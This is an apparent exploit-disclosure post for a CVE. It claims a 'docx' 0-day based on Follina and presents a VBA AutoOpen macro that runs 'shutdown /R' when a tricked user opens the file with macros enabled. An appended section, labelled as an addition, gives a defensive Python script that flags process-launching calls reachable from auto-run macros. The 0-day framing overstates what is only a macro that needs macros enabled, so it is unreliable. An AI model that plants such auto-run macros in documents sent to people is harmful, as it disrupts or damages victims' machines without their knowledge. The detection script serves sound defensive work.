CVSS3

- Attack Vector: LOCAL
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: REQUIRED
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: HIGH
- Availability Impact: HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)
The problem is still in the "docx" files; this vulnerability is a 0-day
based on the Follina exploit. Microsoft still doesn't want to
understand that they MUST remove the macro options from Office 365
and their offline app. In this video, you will see an example of how
some users can be tricked into opening the malicious file that is sent
to them by the attacker. After the file is executed, things will be
very bad for the users who execute it on their computer.
It depends on the scenario.
### The exploit:
```vbs
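' AutoOpen runs automatically when the document is opened with macros enabled.
Sub AutoOpen()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    ' Command handed to the operating system: restart the machine.
    Program = "shutdown /R"
    TaskID = Shell(Program, 1)
    ' With errors suppressed above, report a failed launch explicitly.
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub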
```
- Enjoy watching
### PoC:
[video](https://www.patreon.com/posts/cve-2024-30104-107163015)
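
A defender-side triage check for the macro pattern above, as an added example that is not part of the original post: it parses extracted VBA source, finds procedures Office runs automatically, and reports process-launching calls reachable from them, including through a helper procedure. The `AUTO_RUN` list, the function names and the sample macro are constructed for illustration.

```python
import re

# Procedure names Office runs automatically on open/close (common ones, not exhaustive).
AUTO_RUN = {"autoopen", "autoexec", "autoclose", "auto_open",
            "document_open", "document_close", "workbook_open"}
# VBA calls that start a process or instantiate a COM object.
LAUNCH = re.compile(r"\b(Shell|ShellExecute|CreateObject|GetObject)\b", re.I)
PROC = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)

def split_procedures(source):
    """Map each Sub/Function name (lowercased) to its body lines."""
    procs, name = {}, None
    for line in source.splitlines():
        if line.lstrip().startswith("'"):      # skip full-line comments
            continue
        m = PROC.match(line)
        if m:
            name = m.group(1).lower()
            procs[name] = []
        elif END.match(line):
            name = None
        elif name:
            procs[name].append(line)
    return procs

def triage(source):
    """Return (auto-run entry, procedure containing the call, call name) tuples."""
    procs = split_procedures(source)
    findings = []
    for entry in sorted(AUTO_RUN & set(procs)):
        seen, todo = set(), [entry]
        while todo:
            cur = todo.pop()
            if cur in seen:
                continue
            seen.add(cur)
            body = "\n".join(procs[cur])
            findings += [(entry, cur, m.group(1)) for m in LAUNCH.finditer(body)]
            # Follow calls into other procedures defined in the same module.
            todo += [p for p in procs if re.search(rf"\b{p}\b", body, re.I)]
    return findings

# Constructed sample: the launch is moved out of AutoOpen into a helper.
INDIRECT = '''Sub AutoOpen()
    RunIt "notepad.exe"
End Sub
Private Sub RunIt(cmd As String)
    Dim t As Double
    t = Shell(cmd, 1)
End Sub'''

if __name__ == "__main__":
    print(triage(INDIRECT))
```

The check operates on macro source text that has already been extracted from the document, and a macro that launches a process only when the user runs it by hand is deliberately not reported.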